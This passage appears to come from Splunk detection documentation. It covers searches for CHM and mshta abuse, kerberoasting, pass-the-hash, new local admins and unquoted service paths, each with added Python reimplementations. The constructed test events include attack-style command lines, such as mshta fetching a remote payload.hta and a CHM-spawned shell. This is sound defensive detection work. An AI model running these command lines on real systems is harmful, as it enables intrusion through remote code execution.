You must ingest your Windows security event logs into the `Change` datamodel under the `Account_Management` nodename for this search to execute successfully. Consider updating the cron schedule and the count of lockouts you want to monitor according to your environment.

Required field

ATT&CK

ID Technique Tactic
T1078.003 Local Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It is possible that a legitimate user is experiencing an issue causing multiple account login failures leading to lockouts.

Reference

Test Dataset


version: 3
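
Both lockout searches above count lockout results grouped by a single field (the originating endpoint in one, the user in the other) and alert when the count exceeds 5, relying on the scheduled search's time range to define "a short period". The following Python is an added example, not Splunk's code: one function serves both searches, makes the time window explicit as a sliding window, and runs over constructed lockout records. Hostnames, user names and times are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def _t(hhmm):
    """Build a timestamp on a fixed day from an HH:MM string (constructed data only)."""
    return datetime(2020, 11, 9, int(hhmm[:2]), int(hhmm[3:]))


# Constructed Account_Management-style records: kiosk01 locks out six different users within six
# minutes; alice is locked out seven times from seven different hosts; bob has one lockout.
LOCKOUTS = (
    [{"_time": _t(f"09:{i:02d}"), "user": f"user{i}", "dest": "kiosk01", "result": "lockout"} for i in range(6)]
    + [{"_time": _t(f"10:{i * 2:02d}"), "user": "alice", "dest": f"ws{i:02d}", "result": "lockout"} for i in range(7)]
    + [{"_time": _t("11:00"), "user": "bob", "dest": "ws20", "result": "lockout"},
       {"_time": _t("11:05"), "user": "bob", "dest": "ws20", "result": "success"}]
)


def excessive(records, key, threshold=5, window=timedelta(hours=1)):
    """Group lockout records by `key` ("dest" reproduces the endpoint search, "user" the user search)
    and report groups with more than `threshold` lockouts inside any sliding window of length `window`.
    The reported span is the last qualifying window, with the values of the other field collected
    the way the endpoint search collects values(All_Changes.user)."""
    other = "user" if key == "dest" else "dest"
    by_key = defaultdict(list)
    for r in records:
        if r["result"] == "lockout":
            by_key[r[key]].append(r)
    hits = {}
    for k, evs in by_key.items():
        evs.sort(key=lambda r: r["_time"])
        start = 0
        for end in range(len(evs)):
            # Advance the window start until the window fits.
            while evs[end]["_time"] - evs[start]["_time"] > window:
                start += 1
            if end - start + 1 > threshold:
                span = evs[start:end + 1]
                hits[k] = {"count": len(span), "firstTime": span[0]["_time"], "lastTime": span[-1]["_time"],
                           other: sorted({r[other] for r in span})}
    return hits


if __name__ == "__main__":
    print("by endpoint:", excessive(LOCKOUTS, "dest"))
    print("by user:", excessive(LOCKOUTS, "user"))
```

The kiosk case reported by the endpoint search is exactly the false positive the page notes: a shared machine locking out many distinct users. The user search, by contrast, surfaces one account hit from many hosts, which is the pattern worth escalating.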


Detect html help renamed

The following analytic identifies a renamed instance of hh.exe (HTML Help) executing a Compiled HTML Help (CHM) file. This technique loads Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only html/htm content is executed. Upon successful execution, the following script engines may be used: JScript, VBScript, VBScript.Encode, JScript.Encode and JScript.Compact. Analysts may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to support the execution of Shortcut commands or WSH script code. During investigation, identify where the script content originated. Validate that it is the legitimate version of hh.exe by reviewing the PE metadata. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.001
  • Last Updated: 2021-02-11

Search

`sysmon` EventID=1 OriginalFileName=HH.exe NOT process_name=hh.exe | stats count min(_time) as firstTime max(_time) as lastTime by Computer, User, parent_process_name, process_name, OriginalFileName, process_path, CommandLine | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_renamed_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed hh.exe may be used.

Required field

ATT&CK

ID Technique Tactic
T1218.001 Compiled HTML File Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely a renamed instance of hh.exe will be used legitimately, filter as needed.

Reference


Test Dataset


version: 1


Detect html help spawn child process

The following analytic identifies hh.exe (HTML Help) executing a Compiled HTML Help (CHM) file and spawning a child process. This technique loads Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only html/htm content is executed. Upon successful execution, the following script engines may be used: JScript, VBScript, VBScript.Encode, JScript.Encode and JScript.Compact. Analysts may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to support the execution of Shortcut commands or WSH script code. During investigation, identify where the script content originated. Review the child process events and investigate further. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.001
  • Last Updated: 2021-02-11

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=hh.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_spawn_child_process_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting process information from your endpoints, including the process name, parent process and command line, into the `Processes` node of the `Endpoint` datamodel.

Required field

ATT&CK

ID Technique Tactic
T1218.001 Compiled HTML File Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, some legitimate applications (ex. web browsers) may spawn a child process. Filter as needed.

Reference


Test Dataset


version: 1


Detect html help url in command line

The following analytic identifies hh.exe (HTML Help) executing a Compiled HTML Help (CHM) file from a remote URL. This technique loads Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only html/htm content is executed. Upon successful execution, the following script engines may be used: JScript, VBScript, VBScript.Encode, JScript.Encode and JScript.Compact. Analysts may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to support the execution of Shortcut commands or WSH script code. During investigation, identify where the script content originated and review the reputation of the remote IP and domain. In some instances it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.001
  • Last Updated: 2021-02-11

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=hh.exe Processes.process=*http* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_url_in_command_line_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting process information from your endpoints, including the process name, parent process and command line, into the `Processes` node of the `Endpoint` datamodel.

Required field

ATT&CK

ID Technique Tactic
T1218.001 Compiled HTML File Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, some legitimate applications may retrieve a CHM remotely, filter as needed.

Reference


Test Dataset


version: 1


Detect html help using infotech storage handlers

The following analytic identifies hh.exe (HTML Help) executing a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This technique loads Windows script code from a compiled help file through an InfoTech Storage handler; itss.dll is loaded upon execution. Three InfoTech Storage handlers are supported: ms-its, its and mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon successful execution, the following script engines may be used: JScript, VBScript, VBScript.Encode, JScript.Encode and JScript.Compact. Analysts may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to support the execution of Shortcut commands or WSH script code. During investigation, identify where the script content originated. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.001
  • Last Updated: 2021-02-11

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=hh.exe Processes.process IN ("*its:*", "*mk:@MSITStore:*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_using_infotech_storage_handlers_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting process information from your endpoints, including the process name, parent process and command line, into the `Processes` node of the `Endpoint` datamodel.

Required field

ATT&CK

ID Technique Tactic
T1218.001 Compiled HTML File Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It is rare to see instances of InfoTech Storage Handlers being used, but it does happen in some legitimate instances. Filter as needed.

Reference


Test Dataset


version: 1


Detect kerberoasting

This search detects a potential kerberoasting attack via service principal name requests

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1558.003
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval _time=map_get(input_event, "_time"), EventCode=map_get(input_event, "event_code"), TicketOptions=map_get(input_event, "ticket_options"), TicketEncryptionType=map_get(input_event, "ticket_encryption_type"), ServiceName=map_get(input_event, "service_name"), ServiceID=map_get(input_event, "service_id") | where EventCode="4769" AND TicketOptions="0x40810000" AND TicketEncryptionType="0x17" | first_time_event input_columns=["EventCode","TicketOptions","TicketEncryptionType","ServiceName","ServiceID"] | where first_time_EventCode_TicketOptions_TicketEncryptionType_ServiceName_ServiceID | eval start_time=_time, end_time=_time, body="TBD", entities="TBD" | select start_time, end_time, entities, body | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

The test data is converted from Windows Security Event logs generated by an Attack Range simulation; the logic was first implemented as an SPL search and then extended to SPL2.

Required field

  • service_name
  • _time
  • event_code
  • ticket_encryption_type
  • service_id
  • ticket_options


ATT&CK

ID Technique Tactic
T1558.003 Kerberoasting Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Older systems that use Kerberos RC4 encryption by default, such as NetApp, may generate false positives.

Reference

  • Initial ESCU implementation by Jose Hernandez and Patrick Bareiss


Test Dataset

version: 1


Detect mshta url in command line

This analytic identifies when the Microsoft HTML Application Host (mshta.exe) utility is used to make remote HTTP connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command-line arguments containing http or https URLs. This technique is commonly used by malicious software to bypass preventative controls. The search returns the first and last time these command-line arguments were used for these executions, as well as the target system, the user, the process (mshta.exe) and its parent process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.005
  • Last Updated: 2021-01-20

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=mshta.exe (Processes.process="*http://*" OR Processes.process="*https://*") by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mshta_url_in_command_line_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting process information from your endpoints, including the process name, parent process and command line, into the `Processes` node of the `Endpoint` datamodel.

Required field

ATT&CK

ID Technique Tactic
T1218.005 Mshta Defense Evasion


Kill Chain Phase

  • Exploitation


Known False Positives

It is possible legitimate applications may perform this behavior and will need to be filtered.

Reference


Test Dataset


version: 1
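
The four HTML Help searches above and the mshta search each test one or two fields of a process event: OriginalFileName against process_name for the renamed case, parent_process_name for the child-process case, and a substring of the command line for the URL and InfoTech Storage handler cases. The following Python is an added example, not Splunk's code: it applies all five checks to a constructed set of process events so their differences are visible side by side. Hostnames, users, paths and the example.test URLs are constructed; the detection labels in the output are this example's own.

```python
def ev(dest, user, process_name, parent_process_name, process, original_file_name=""):
    """Build a constructed Endpoint.Processes-style record (OriginalFileName comes from Sysmon event 1)."""
    return {"dest": dest, "user": user, "process_name": process_name, "parent_process_name": parent_process_name,
            "process": process, "OriginalFileName": original_file_name}


EVENTS = [
    # Benign: the real hh.exe opening a local CHM.
    ev("ws01", "alice", "hh.exe", "explorer.exe", r'"C:\Windows\hh.exe" C:\Users\alice\Downloads\guide.chm', "HH.exe"),
    # hh.exe copied and renamed; the PE's OriginalFileName still says HH.exe.
    ev("ws01", "alice", "helper.exe", "explorer.exe", r"helper.exe C:\Users\alice\AppData\Local\Temp\a.chm", "HH.exe"),
    # Script inside a CHM spawned a shell.
    ev("ws01", "alice", "cmd.exe", "hh.exe", "cmd.exe /c whoami"),
    # CHM fetched from a remote URL.
    ev("ws02", "bob", "hh.exe", "explorer.exe", "hh.exe http://example.test/help.chm", "HH.exe"),
    # InfoTech Storage handlers: mk:@MSITStore and ms-its (the SPL "*its:*" wildcard also covers ms-its:).
    ev("ws02", "bob", "hh.exe", "explorer.exe", r"hh.exe mk:@MSITStore:C:\Users\bob\a.chm::/run.htm", "HH.exe"),
    ev("ws02", "bob", "hh.exe", "explorer.exe", r"hh.exe ms-its:C:\Users\bob\b.chm::/x.htm", "HH.exe"),
    # mshta pulling a remote HTA from an Office parent, then a benign local HTA.
    ev("ws03", "carol", "mshta.exe", "winword.exe", "mshta.exe https://example.test/payload.hta"),
    ev("ws03", "carol", "mshta.exe", "explorer.exe", r"mshta.exe C:\ProgramData\local.hta"),
]


def html_help_detections(event):
    """Return the names of the searches above that the event would satisfy."""
    name = event["process_name"].lower()
    parent = event.get("parent_process_name", "").lower()
    cmd = event["process"].lower()
    hits = []
    if event.get("OriginalFileName", "").lower() == "hh.exe" and name != "hh.exe":
        hits.append("html_help_renamed")
    if parent == "hh.exe":
        hits.append("html_help_spawn_child_process")
    # The hh.exe search uses *http*, so it also matches https and any argument containing "http".
    if name == "hh.exe" and "http" in cmd:
        hits.append("html_help_url_in_command_line")
    if name == "hh.exe" and ("its:" in cmd or "mk:@msitstore:" in cmd):
        hits.append("html_help_using_infotech_storage_handlers")
    # The mshta search is stricter and requires a scheme prefix.
    if name == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
        hits.append("mshta_url_in_command_line")
    return hits


def run_detections(events):
    """Apply the checks to every event and keep the ones that fired, with the fields an analyst needs first."""
    out = []
    for event in events:
        hits = html_help_detections(event)
        if hits:
            out.append({"dest": event["dest"], "user": event["user"], "process": event["process"], "hits": hits})
    return out


if __name__ == "__main__":
    for row in run_detections(EVENTS):
        print(row["dest"], row["user"], row["hits"], row["process"])
```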


Detect new local admin account

This search looks for newly created accounts that have been elevated to local administrators.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1136.001
  • Last Updated: 2020-07-08

Search

`wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators) | transaction member_id connected=false maxspan=180m | rename member_id as user | stats count min(_time) as firstTime max(_time) as lastTime by user dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_new_local_admin_account_filter`

Associated Analytic Story


How To Implement

You must be ingesting Windows event logs using the Splunk Windows TA and collecting event codes 4720 and 4732.

Required field

ATT&CK

ID Technique Tactic
T1136.001 Local Account Persistence


Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Known False Positives

The activity may be legitimate. For this reason, it's best to verify the account with an administrator and ask whether there was a valid service request for the account creation. If your local administrator group name is not "Administrators", this search may generate an excessive number of false positives

Reference

Test Dataset


version: 2
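
The search above correlates an account creation (4720) with an addition to the Administrators group (4732) on the same SID inside a 180-minute span. The following Python is an added example, not Splunk's code, that performs the same correlation over constructed events. It assumes, as the search's `transaction member_id` implies, that the TA exposes the created or added account's SID as member_id in both event types; the SIDs, hosts and times are constructed. One deliberate difference: the SPL transaction also emits single-event groups, whereas this version reports only SIDs that have both events within the span, and it takes the local administrators group name as a parameter to address the false positive the page notes.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def _t(hhmm):
    """Timestamp on a fixed day from an HH:MM string (constructed data only)."""
    return datetime(2020, 7, 8, int(hhmm[:2]), int(hhmm[3:]))


# Constructed Windows Security events. Field names follow the search above (member_id, Group_Name).
EVENTS = [
    {"_time": _t("10:00"), "EventCode": 4720, "member_id": "S-1-5-21-1-2-3-1105", "user": "svc_backup", "dest": "ws01"},
    {"_time": _t("10:20"), "EventCode": 4732, "member_id": "S-1-5-21-1-2-3-1105", "Group_Name": "Administrators", "dest": "ws01"},
    # Created and elevated six hours apart: outside the 180-minute span.
    {"_time": _t("09:00"), "EventCode": 4720, "member_id": "S-1-5-21-1-2-3-1106", "user": "temp_user", "dest": "ws02"},
    {"_time": _t("15:00"), "EventCode": 4732, "member_id": "S-1-5-21-1-2-3-1106", "Group_Name": "Administrators", "dest": "ws02"},
    # Existing account added to a different group.
    {"_time": _t("11:00"), "EventCode": 4732, "member_id": "S-1-5-21-1-2-3-1001", "Group_Name": "Remote Desktop Users", "dest": "ws01"},
    # Elevation of an account with no creation event in the data.
    {"_time": _t("12:00"), "EventCode": 4732, "member_id": "S-1-5-21-1-2-3-1107", "Group_Name": "Administrators", "dest": "ws03"},
]


def new_local_admins(events, admin_group="Administrators", maxspan=timedelta(minutes=180)):
    """Pair each 4720 with any 4732 into `admin_group` for the same SID within `maxspan` (either order)."""
    created = defaultdict(list)    # SID -> 4720 events
    elevated = defaultdict(list)   # SID -> 4732 events into the admin group
    for event in events:
        if event["EventCode"] == 4720:
            created[event["member_id"]].append(event)
        elif event["EventCode"] == 4732 and event.get("Group_Name", "").lower() == admin_group.lower():
            elevated[event["member_id"]].append(event)
    hits = []
    for sid, creations in created.items():
        for c in creations:
            for e in elevated.get(sid, []):
                if abs(e["_time"] - c["_time"]) <= maxspan:
                    hits.append({"user": c["user"], "sid": sid, "dest": c["dest"],
                                 "created": c["_time"], "elevated": e["_time"]})
    return hits


if __name__ == "__main__":
    for hit in new_local_admins(EVENTS):
        print(hit)
```

On a system whose local administrators group is localized, pass that name as `admin_group`; the search's Group_Name filter would need the same adjustment.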


Detect oulook exe writing a zip file

This search looks for execution of process `outlook.exe` where the process is writing a `.zip` file to the disk.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1566.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=outlook.exe OR Processes.process_name=explorer.exe by _time span=5m Processes.parent_process_id Processes.process_id Processes.dest Processes.process_name Processes.parent_process_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename process_id as malicious_id | rename parent_process_id as outlook_id | join malicious_id type=inner[ | tstats `security_content_summariesonly` count values(Filesystem.file_path) as file_path values(Filesystem.file_name) as file_name FROM datamodel=Endpoint.Filesystem where (Filesystem.file_path=*zip* OR Filesystem.file_name=*.lnk ) AND (Filesystem.file_path=C:\\Users* OR Filesystem.file_path=*Local\\Temp*) by _time span=5m Filesystem.process_id Filesystem.file_hash Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename process_id as malicious_id | fields malicious_id outlook_id dest file_path file_name file_hash count file_id] | table firstTime lastTime user malicious_id outlook_id process_name parent_process_name file_name file_path | where file_name != "" | `detect_oulook_exe_writing_a__zip_file_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records filesystem and process activity from your hosts to populate the Endpoint data model. This is typically populated via an endpoint detection and response product, such as Carbon Black, or endpoint data sources, such as Sysmon.

Required field

ATT&CK

ID Technique Tactic
T1566.001 Spearphishing Attachment Initial Access


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

It is not uncommon for Outlook to write legitimate zip files to disk.

Reference

Test Dataset

version: 3


Detect pass the hash

This search looks for specific authentication events from the Windows Security Event logs to detect potential attempts using Pass-the-Hash technique.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1550.002
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval _time=map_get(input_event, "_time"), EventCode=map_get(input_event, "event_code"), LogonType=map_get(input_event, "logon_type"), LogonProcess=map_get(input_event, "logon_process"), ComputerName=map_get(input_event, "dest_ip_primary_artifact"), AccountName=map_get(input_event, "dest_user_primary_artifact") | where (LogonType="3" AND LogonProcess="NtLmSsp" AND AccountName IS NOT NULL) OR (LogonType="9" AND LogonProcess="seclogo") | first_time_event input_columns=["EventCode","LogonProcess","ComputerName"] | where first_time_EventCode_LogonProcess_ComputerName | eval start_time=_time, end_time=_time, body="TBD", entities="TBD" | select start_time, end_time, entities, body | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

The test data is converted from Windows Security Event logs generated by an Attack Range simulation; the logic was first implemented as an SPL search and then extended to SPL2.

Required field

  • logon_process
  • dest_user_primary_artifact
  • _time
  • event_code
  • dest_ip_primary_artifact
  • logon_type


ATT&CK

ID Technique Tactic
T1550.002 Pass the Hash Defense Evasion, Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Legitimate logon activity by authorized NTLM systems may be detected by this search. Please investigate as appropriate.

Reference

  • Initial ESCU implementation by Bhavin Patel and Patrick Bareiss


Test Dataset

version: 1
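
The kerberoasting search earlier on this page and the pass-the-hash search above share one mechanism: filter events on a few field values, then keep only the first occurrence of a key with the SPL2 `first_time_event` command. The following Python is an added example, not Splunk's code, that implements that command once and applies it to both searches over constructed SSA-style input events (string-valued fields, as the searches read them). The event values, hosts, SIDs and service names are constructed. It also makes a caveat of the pass-the-hash key visible: because the key is (EventCode, LogonProcess, ComputerName) without the user, a second NTLM network logon to the same host by a different account is suppressed.

```python
def first_time_event(events, columns):
    """Yield each event whose tuple of `columns` values has not appeared earlier in the stream.
    This mirrors the SPL2 first_time_event command; state lives only for this run."""
    seen = set()
    for event in events:
        key = tuple(event.get(c) for c in columns)
        if key not in seen:
            seen.add(key)
            yield event


# Constructed 4769/4768 ticket events. 0x40810000 are the ticket options and 0x17 is RC4-HMAC,
# the combination the kerberoasting search keys on.
KERBEROS_EVENTS = [
    {"_time": "1603267200", "event_code": "4769", "ticket_options": "0x40810000", "ticket_encryption_type": "0x17",
     "service_name": "MSSQLSvc/db01.corp.example:1433", "service_id": "S-1-5-21-1-2-3-1201"},
    {"_time": "1603267260", "event_code": "4769", "ticket_options": "0x40810000", "ticket_encryption_type": "0x17",
     "service_name": "MSSQLSvc/db01.corp.example:1433", "service_id": "S-1-5-21-1-2-3-1201"},  # repeat: suppressed
    {"_time": "1603267320", "event_code": "4769", "ticket_options": "0x40810000", "ticket_encryption_type": "0x12",
     "service_name": "krbtgt/CORP", "service_id": "S-1-5-21-1-2-3-502"},                      # AES256: not matched
    {"_time": "1603267380", "event_code": "4769", "ticket_options": "0x40810000", "ticket_encryption_type": "0x17",
     "service_name": "HTTP/web01.corp.example", "service_id": "S-1-5-21-1-2-3-1202"},
    {"_time": "1603267440", "event_code": "4768", "ticket_options": "0x40810010", "ticket_encryption_type": "0x17",
     "service_name": "krbtgt/CORP", "service_id": "S-1-5-21-1-2-3-502"},                      # TGT request: not 4769
]

# Constructed 4624 logon events.
LOGON_EVENTS = [
    {"_time": "1603267200", "event_code": "4624", "logon_type": "3", "logon_process": "NtLmSsp",
     "dest_ip_primary_artifact": "10.0.0.5", "dest_user_primary_artifact": "alice"},
    {"_time": "1603267260", "event_code": "4624", "logon_type": "3", "logon_process": "NtLmSsp",
     "dest_ip_primary_artifact": "10.0.0.5", "dest_user_primary_artifact": "bob"},   # same key as above: suppressed
    {"_time": "1603267320", "event_code": "4624", "logon_type": "9", "logon_process": "seclogo",
     "dest_ip_primary_artifact": "10.0.0.7", "dest_user_primary_artifact": None},
    {"_time": "1603267380", "event_code": "4624", "logon_type": "3", "logon_process": "Kerberos",
     "dest_ip_primary_artifact": "10.0.0.5", "dest_user_primary_artifact": "carol"}, # Kerberos: not matched
    {"_time": "1603267440", "event_code": "4624", "logon_type": "2", "logon_process": "User32 ",
     "dest_ip_primary_artifact": "10.0.0.9", "dest_user_primary_artifact": "dave"},  # interactive: not matched
]


def kerberoasting(events):
    """RC4 service ticket requests, first time seen per (code, options, etype, service name, service SID)."""
    candidates = (e for e in events
                  if e.get("event_code") == "4769"
                  and e.get("ticket_options") == "0x40810000"
                  and e.get("ticket_encryption_type") == "0x17")
    return list(first_time_event(candidates, ["event_code", "ticket_options", "ticket_encryption_type",
                                              "service_name", "service_id"]))


def pass_the_hash(events):
    """NTLM network logons with an account name, or NewCredentials (type 9) logons via seclogo,
    first time seen per (code, logon process, destination host)."""
    def suspicious(e):
        logon_type, logon_process = e.get("logon_type"), e.get("logon_process")
        return ((logon_type == "3" and logon_process == "NtLmSsp" and e.get("dest_user_primary_artifact") is not None)
                or (logon_type == "9" and logon_process == "seclogo"))
    return list(first_time_event(filter(suspicious, events), ["event_code", "logon_process", "dest_ip_primary_artifact"]))


if __name__ == "__main__":
    for e in kerberoasting(KERBEROS_EVENTS):
        print("kerberoast candidate:", e["service_name"])
    for e in pass_the_hash(LOGON_EVENTS):
        print("pass-the-hash candidate:", e["logon_type"], e["logon_process"], e["dest_ip_primary_artifact"])
```

Adding the user to the pass-the-hash key (or dropping the first-time filter entirely and counting instead) trades the suppression shown by the second logon event for more volume; which is right depends on how common NTLM still is in the environment, the false positive the page itself names.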


Detect path interception by creation of program exe

This detection identifies abuse of unquoted service paths, a popular privilege escalation technique: a process started by services.exe whose executable name differs from the executable named in the service's configured command line indicates that a file planted earlier in the unquoted path was run instead of the intended service binary.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1574.009
  • Last Updated: 2020-07-03

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=services.exe by Processes.user Processes.process_name Processes.process Processes.dest index | `drop_dm_object_name(Processes)` | rex field=process "^.*?\\\\(?<service_process>[^\\\\]*\.(?:exe |bat |com |ps1))" | eval process_name = lower(process_name) | eval service_process = lower(service_process) | where process_name != service_process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_path_interception_by_creation_of_program_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1574.009 Path Interception by Unquoted Path Defense Evasion, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference


Test Dataset


version: 3
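
The search above extracts the executable named in the command line with a rex and compares it to the process name actually launched under services.exe. The following Python is an added example, not Splunk's code, that performs the same comparison over constructed process events. The regular expression is adjusted from the page's: it accepts an end-of-string or a closing quote after the extension, so a service path with no arguments and a correctly quoted path are both parsed; hostnames, users and vendor paths are constructed.

```python
import re

# First path component ending in .exe/.bat/.com/.ps1, followed by whitespace, a closing quote or end of string.
SERVICE_IMAGE = re.compile(r'^.*?\\(?P<service_process>[^\\]*\.(?:exe|bat|com|ps1))"?(?=\s|$)', re.IGNORECASE)

# Constructed Endpoint.Processes-style records for children of services.exe.
PROCESS_EVENTS = [
    # Windows resolved the unquoted path to C:\Program.exe, but the command line is still the configured path.
    {"dest": "ws01", "user": "SYSTEM", "parent_process_name": "services.exe", "process_name": "program.exe",
     "process": r"C:\Program Files\Vendor App\service.exe"},
    # Normal service start: launched image matches the configured one.
    {"dest": "ws01", "user": "SYSTEM", "parent_process_name": "services.exe", "process_name": "svchost.exe",
     "process": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    # Interception one level deeper: C:\Program Files\Vendor.exe ran instead of the service binary.
    {"dest": "ws02", "user": "SYSTEM", "parent_process_name": "services.exe", "process_name": "vendor.exe",
     "process": r"C:\Program Files\Vendor App\service.exe -svc"},
    # Properly quoted path: nothing to intercept.
    {"dest": "ws02", "user": "SYSTEM", "parent_process_name": "services.exe", "process_name": "myservice.exe",
     "process": r'"C:\Program Files\Vendor App\myservice.exe" --run'},
    # Not a service child: ignored regardless of the mismatch.
    {"dest": "ws03", "user": "alice", "parent_process_name": "explorer.exe", "process_name": "program.exe",
     "process": r"C:\Program Files\Vendor App\updater.exe"},
]


def service_image(cmdline):
    """Return the lower-cased file name the command line says should have run, or None if none is found."""
    match = SERVICE_IMAGE.match(cmdline)
    return match.group("service_process").lower() if match else None


def path_interceptions(events):
    """Children of services.exe whose launched image differs from the image named in the command line."""
    hits = []
    for event in events:
        if event["parent_process_name"].lower() != "services.exe":
            continue
        expected = service_image(event["process"])
        actual = event["process_name"].lower()
        if expected and expected != actual:
            hits.append({"dest": event["dest"], "user": event["user"], "process_name": actual,
                         "configured_image": expected, "process": event["process"]})
    return hits


if __name__ == "__main__":
    for hit in path_interceptions(PROCESS_EVENTS):
        print(f'{hit["dest"]}: launched {hit["process_name"]} for configured {hit["configured_image"]} ({hit["process"]})')
```

The check is only as good as the command line field: if the endpoint source records the resolved image path rather than the service's configured ImagePath, the two names will always agree and the detection is blind.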


Detect prohibited applications spawning cmd exe

This search looks for executions of cmd.exe spawned by a process that is often abused by attackers and that does not typically launch cmd.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.003
  • Last Updated: 2020-11-10

Search

